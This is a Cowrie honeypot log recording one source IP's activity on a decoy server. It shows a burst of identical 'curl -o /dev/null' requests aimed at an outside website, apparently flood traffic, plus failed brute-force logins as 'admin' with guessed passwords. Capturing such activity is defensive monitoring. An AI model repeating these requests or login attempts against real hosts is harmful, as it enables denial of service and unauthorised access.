{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.167386Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.168396Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.223134Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.224063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.260910Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.261900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.300878Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.301762Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.338739Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.339790Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.376770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.377671Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.416807Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.417706Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.454746Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.455699Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.494433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.495422Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.548787Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.549829Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.589413Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.590792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.629655Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.630642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.667964Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.668947Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.714397Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.715656Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.755111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.756122Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.793585Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.794529Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bdfyjdf","message":"login attempt [admin/bdfyjdf] failed","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.811575Z","src_ip":"212.227.125.160","session":"4c304f98ee6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.831412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.832347Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.869637Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.870563Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.912170Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.913331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:28.963190Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:28.964184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.001077Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.002150Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.040684Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.041944Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.078885Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.079877Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.117545Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.118766Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.156467Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.157392Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.206499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.207636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.244582Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.245300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.285408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.286470Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.324216Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.325173Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.371969Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.372889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.894104Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.895206Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bassbass","message":"login attempt [admin/bassbass] failed","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.909847Z","src_ip":"212.227.125.160","session":"4c304f98ee6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.933808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.935323Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:29.973742Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:29.975014Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.014065Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.015009Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.052681Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.053569Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.090958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.091830Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.134296Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.135377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.174434Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.175534Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.213399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.214495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.263732Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.265227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.303563Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.304426Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.342905Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.343842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.381610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.382477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.422077Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.423275Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.460692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.461882Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.501548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.502626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.539704Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.540784Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.578915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.580315Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.617074Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.618242Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.665692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.666654Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.704130Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.705570Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.745657Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.746567Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.783280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.784377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.821269Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.822305Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.859262Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.860447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.903560Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.904674Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.949847Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.951177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bartok","message":"login attempt [admin/bartok] failed","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.974408Z","src_ip":"212.227.125.160","session":"4c304f98ee6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:30.988553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:30.989538Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.026264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.027578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.076990Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.078129Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.117409Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.118531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.157739Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.159108Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.196660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.197899Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.234997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.236045Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
